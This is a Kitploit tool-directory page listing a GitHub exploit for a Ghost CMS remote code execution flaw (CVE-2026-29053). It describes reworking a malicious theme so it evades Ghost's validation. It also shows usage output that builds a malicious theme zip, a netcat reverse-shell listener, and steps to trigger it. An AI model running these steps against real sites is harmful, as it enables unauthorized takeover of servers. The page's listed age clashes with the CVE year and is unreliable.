Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-29053 — (RCE) vulnerability discovered in Ghost CMS (specifically affecting versions 0.7.2 through 6.19.0) | Kitploit
Tools/GitHubGitHub/ac8999/cve-2026-29053
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingPayload Development
GitHubac8999/cve-2026-29053

CVE-2026-29053

(RCE) vulnerability discovered in Ghost CMS (specifically affecting versions 0.7.2 through 6.19.0)

View Repository
114 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

This is a rework of the Repo by rootxran for this same CVE - https://github.com/rootxran/CVE-2026-29053

During testing against specific Ghost CMS environments, the original theme payload triggered a Fatal Handlebars Error. The CMS failed to activate the malicious theme because it referenced a deprecated or missing helper (social_url) within the author.hbs file.

I have updated the Handlebars templates to use native, compatible helpers. This ensures the theme passes Ghost’s internal validation checks, allowing the exploit to activate successfully without being blocked by the theme engine's safety parser.

Usage: (refer to the original exploit for the video guidance).

root@kitploit:~
┌──(root㉿user)-[/tmp/CVE-2026-29053]
└─# python3 exploit.py -i 10.10.15.93 -p 4444
[+] Payload: 10.10.15.93:4444
[+] Created: /tmp/CVE-2026-29053/malicious-theme.zip

1. nc -lvnp 4444
2. Upload theme, create page with slug 'rce'
3. Visit /rce/
Download Tool